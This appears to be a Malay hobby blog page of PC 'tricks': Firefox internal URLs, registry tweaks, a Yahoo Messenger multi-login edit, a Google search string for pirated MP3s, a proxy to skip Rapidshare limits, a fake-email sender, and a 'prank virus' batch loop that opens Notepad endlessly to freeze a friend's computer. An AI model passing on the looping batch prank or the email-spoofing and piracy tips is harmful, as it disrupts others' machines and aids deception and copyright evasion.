Mozilla firefox trick




A'kum..
Sebelum Admin mulakan pada hari ini admin mengucapkan selamat menyambut bulan ramadan kepada semua umat islam sama ada di dalam atau di luar negara. pada kali ini Admin akan kongsi trick untuk mozilla firefox .
Korang just try n then korang akan tau apa hasil nya..

copy kod kod dibawah dan paste pada url korang.pilih mana korang mahu.

chrome://global/content/alerts/alert.xul
Firefox akan akan keluar popop pada address bar setip sudut
chrome://browser/content/browser.xul
ia akan buka semua tab pada tab yang ada
chrome://browser/content/preferences/preferences.xul
buka option
chrome://browser/content/bookmarks/bookmarksPanel.xul
url ini akan buka bookmark manager firefox
chrome://browser/content/history/history-panel.xul
buka history tab
chrome://browser/content/preferences/cookies.xul
akan buka cookies yang ada pada firefox korang
chrome://browser/content/preferences/sanitize.xul
url dibawah untuk padam private data
chrome://mozapps/content/extensions/extensions.xul?type=extensions
buka addon dan korang leh manage..
chrome://browser/content/aboutDialog.xul

oraite serba sedikit penjelasan dari Admin.. kalau nak tahu lebih lanjut korang boleh try sendiri.

Selamat berpuasa dan a'kum... :)

Read More - Mozilla firefox trick

Cara Buang Buang Icon Recycle Bin Dekstop





Assalamualaikum..
Pada Kali ini Admin akan share dengan korang cara untuk Buagn recycle bin di dekstop koraang. Mayb pada sesetengah orang tak kesah tentang kewujudan recycle bin di dekstop. tetapi sesetengah orang  Seperti Admin tidak suka akan icon yang ada di dekstop. Admin lebih suka dekstop kosong. :) .

Ikut step Admin ajar ini.
Step 1. Start > Run > Regedit  .

Step 2. Lepas keluar registry korang ikut  apa yang Admin tekan. 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\BitBucket
Step 3. Cari key DWORD value nama NukeOnDelete kalau tidak wujud korang wujudkanlah

Step 4. Setting pada Value Data: [0 = Guna Recycle Bin / 1 = Buang recycle Bin]

haa kalau korang rasa cara atas susah korang ikut la cara dibawah ini pula.. Kah3..

start->run->gpedit.msc-> user configuration ->desktop->remove recycle bin from desktop->double click->tukarkan kepada not configured ke enable->apply dan ok.

Sekarang korag pergi ke Start->run->gpupdate.exe dan Enter

Now korang nye recyclebin sudah kasi licin .. Untuk pengetahuan korang mengurangkan icon pada dekstop boleh menambahkan performance komputer korang.. 

Selamat mencuba dari Admin.


Read More - Cara Buang Buang Icon Recycle Bin Dekstop

Trick Auto Buka Notepad Non Stop







Assalamualaikum...

Sudah sekian lama Admin tidak update tentang prank virus. Seperti yang  korang tau, prank virus adalah sejenis virus yang boleh dibawa bergurau dengan rakan2. so pada kali ini
prank virus yang boleh menakutkan kawan korang adalah auto open notepad. notepad akan terbuka berulang kali sebanyak 100 kali boleh membuat kan komputer seseorang 
hang atau bahasa Terengganunya lekat.. kah3.. :)

Step 1. Buka notepad 

Step 2. copy dan paste kod dibawah ke notepad.

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Korang just save dan simpan dengan apa2 nama sekalipon asal kan nama belakang .bat
contohnya..   "pensil.bat "

Selamat Mencuba !!



Read More - Trick Auto Buka Notepad Non Stop

Cara Hantar Email Palsu




Assalamualaikum..
Haa.. Kali ini Admin akan share dengan korang cara untuk hantar email palsu. Apa itu email palsu? kah3.. email palsu ni adalah email tipu2. xpaham lagi? email tersebut boleh di edit
dari siapa kepada siapa . hebat kan? so korang boleh try sendiri.

Step 1. korang just pergi ke laman web ini klik 
Step 2. korang penuhkan la ape yang diminta di situ.
Step 3. pastu send settle.. mudah ja.. :)

Note: Admin tidak bertanggung jawab jika terjadi apa2 kepada sesiapa pun info yang Admin
share di blog ini hanya untuk menambahkan pengetahuan tentang it :) 

Selamat Mencuba..


Read More - Cara Hantar Email Palsu

Download Rapidshare Tanpa Limit




Assalamualaikum..
Admin akan kongsi trik mudah untuk menyenangkan korang download di Rapidshare
tanpa perlu menunggu 150 mnt .. :) caranya korang just pergi ke 
http://anonymouse.org/anonwww.html  dan paste kan link yang korang nak download
tu di laman web  http://anonymouse.org/anonwww.html. settle selamat mencuba ...

Read More - Download Rapidshare Tanpa Limit

Auto Tutup Non Responding Semasa Shutdown




Assalamualaikum..
Kali ini Admin akan berkongsi dengan korang cara untuk buat window korang tutup nonresponding program semasa shutdown. pasti pengguna windows vista dan 7 banyak mengalami masalah ini. So admin try carik penyelesaian bagi masalah tu.

Step 1. Korang pergi start > run > regedit pastu korang ikut key dibawah

HKEY_USERS\.DEFAULT\Control Panel\Desktop

Step 2. korang cari key value nama 

AutoEndTasks, Jenis: REG_SZ (String Value), Value: (0 = disabled, 1 = enabled).

So korang modify dari "0" kepada "1" paham?

Ada sebarang masalah korang boleh inform Admin tinggalkan komen.
jangan lupa restart selamat mencuba.. cheer :)

Read More - Auto Tutup Non Responding Semasa Shutdown

Cara Untuk Mencari / Download Mp3 Paling mudah




Assalamualaikum...
Admin kongsikan cara untuk download mana2 mp3 dengan mudah pada korang dengan hanya
menggunakan trik google ini.. Mai try :)

Step 1. Korang just masukkan kod dibawah pada search google.

intitle:index.of "mp3" +"Nama lagu" -htm -html -php -asp "Last Modified" 

Korang just tukarkan nama lagu tu kepada lagu yang korang nak cari.
contoh seperti dibawah:


intitle:index.of "mp3" +"kuch kuch hota hai" -htm -html -php -asp "Last Modified"
mudah ja.. korang boleh try sendiri..  selamat mencuba.. :)



Read More - Cara Untuk Mencari / Download Mp3 Paling mudah

Hack Yahoo Messengger Multi Login




Assalamualaikum..
Haa.. best kan bile ade 2 yahoo messenger running dalam 1 masa.. Mayb korang mempunyai 
banyak id yahoo messenger so susah la korang untuk online 2 id dalam 1 masa dengan 
menggunakan 1 komputer kan?? :) Sini ade penyelesaian nya.. korang boleh buat multi login..
ikut step dibawah.

Step 1.
HKEY_CURRENT_ USER\Software\yahoo\ pager\Test. then korang tukar value pada plural seperti dibawah
"Plural"=dword: 00000001
jangan lupa korang restart.. cheer :)

Read More - Hack Yahoo Messengger Multi Login